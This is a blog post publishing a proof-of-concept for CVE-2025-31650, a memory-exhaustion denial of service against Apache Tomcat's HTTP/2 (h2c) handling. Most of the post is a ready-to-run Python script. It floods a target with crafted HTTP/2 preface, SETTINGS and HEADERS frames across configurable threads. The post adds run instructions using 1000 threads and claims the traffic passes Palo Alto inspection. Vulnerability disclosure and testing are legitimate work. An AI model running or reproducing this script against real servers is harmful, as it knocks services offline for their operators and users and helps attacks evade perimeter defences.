CVE-2025-31650 (Apache Tomcat HTTP/2 DoS) POC

Posted on by emreefedogan 
import socket
import argparse
import threading

def exploit(target, port):
    try:
        # Raw payload for HTTP/2 h2c (cleartext) handshake and frame manipulation
        payload = (
            b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
            b"\x00\x00\x00\x04\x00\x00\x00\x00\x00"  # SETTINGS frame
            b"\x00\x00\x10\x01\x05\x00\x00\x00\x01"  # HEADERS frame
            b"\x82\x86\x84\x41\x8a\x08\x9d\x5c\x0b\x81\x70\xdc\x7c\x4e\xed"
        )
        
        while True:
            with socket.create_connection((target, port), timeout=5) as sock:
                sock.sendall(payload)
                # Connection is kept open intentionally to trigger the memory leak
    except:
        pass

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--target", required=True)
    parser.add_argument("--port", type=int, default=9090)
    parser.add_argument("--threads", type=int, default=100)
    args = parser.parse_args()

    print(f"[*] Target: {args.target}:{args.port} | Threads: {args.threads}")
    print("[*] Triggering memory leak... Press Ctrl+C to stop")

    for _ in range(args.threads):
        threading.Thread(target=exploit, args=(args.target, args.port), daemon=True).start()

    try:
        while True: pass
    except KeyboardInterrupt:
        print("\n[*] Stopped.")

Reproduction Steps & Bypass Context:

  • Target Environment: The condition was verified against an Apache Tomcat v10.1.33 server with HTTP/2 (h2c) support enabled.
  • Bypass / Exploit Mechanics: The vulnerability leverages continuous and sequential HTTP/2 packets containing manipulated HEADERS frames. The Palo Alto inspection engine currently allows these specific, unauthenticated HTTP/2 upgrade requests to pass through to the backend without dropping the malicious frames.
  • Impact Verification: Once the payload bypasses the perimeter, the server fails to free RAM efficiently, triggering a severe memory leak. During execution, memory consumption spikes rapidly from a stable baseline of 150-170 MB up to 1.5 GB, overloading the Garbage Collection mechanism and causing a complete Denial of Service (DoS).

PoC Execution Instructions: To replicate this bypass and memory exhaustion, deploy a vulnerable Tomcat instance and run the provided Python script. We utilized 1000 threads during our verification to consistently trigger the condition (e.g., python3 poc.py --target <IP> --port 9090 --threads 1000).

https://nvd.nist.gov/vuln/detail/CVE-2025-31650

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Designed By Emre DOGAN
Back To Top